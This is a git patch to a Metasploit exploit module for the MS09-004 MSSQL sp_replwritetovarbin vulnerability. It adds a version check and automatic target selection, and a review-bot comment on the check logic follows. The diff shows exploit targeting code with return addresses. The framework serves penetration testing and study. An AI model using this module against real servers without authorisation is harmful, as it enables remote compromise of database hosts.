From e2a0ff92cefb39be5288970e1d5faaeec8fbb6dd Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Thu, 31 Dec 2009 16:26:32 +0000
Subject: [PATCH] add check and auto-target selection

git-svn-id: file:///home/svn/framework3/trunk@8048 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../mssql/ms09_004_sp_replwritetovarbin.rb | 37 +++++++++++++++++--
 1 file changed, 34 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
index 0eae670d5b..fc882db333 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # Individual targets
 #
 [
- 'MSSQL 2000 / MSDE <= SP2',
+ 'MSSQL 2000 / MSDE',
 {
 'Writable' => 0x42b6cfe0,
 'Ret' => 0x42b6be7b
@@ -76,12 +76,43 @@ class Metasploit3 < Msf::Exploit::Remote
 ))
 end
+ def check
+ info = mssql_ping
+ if (info and info.has_key?('Version'))
+
+ # TODO: better detection
+ if (info['Version'] =~ /8\.00\.194/)
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ # dump the discovered info and return that we detected MSSQL
+ info.each_pair { |k,v|
+ print_status(" #{k + (" " * (15-k.length))} = #{v}")
+ }
+ return Exploit::CheckCode::Detected
+ end
+ return Exploit::CheckCode::Safe
+ end
+
 def exploit
 mytarget = nil
 if target.name =~ /Automatic/
- # nothing yet...
- mytarget = targets[1]
+ print_status("Attempting automatic target detection...")
+ info = mssql_ping
+ if (info and info.has_key?('Version'))
+ if (info['Version'] =~ /8\.00\./)
+ mytarget = targets[1]
+ elsif (info['Version'] =~ /9\.00\./)
+ mytarget = targets[2]
+ end
+ end
+
+ if mytarget.nil?
+ raise RuntimeError, "Unable to automatically detect the target"
+ else
+ print_status("Automatically detected target \"#{mytarget.name}\" from version \"#{info['Version']}\"")
+ end
 else
 mytarget = target
 end
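Review bot: In the new `check`, the final `return Exploit::CheckCode::Safe` is reached whenever `mssql_ping` returns nothing or a reply without a 'Version' key, so a host whose discovery reply was filtered or lost is reported as safe although nothing was tested. `return Exploit::CheckCode::Unknown` describes that case accurately and avoids a false negative in an assessment. At the other end, `Vulnerable` is returned from an unanchored match on the self-reported version string alone, which the TODO already acknowledges; `Exploit::CheckCode::Appears` fits a banner-only result better. The version test is also written twice, here and in `exploit` (whose body continues outside the hunk). A short comment on `check` stating that the result is derived only from the ping reply would keep readers from over-trusting it.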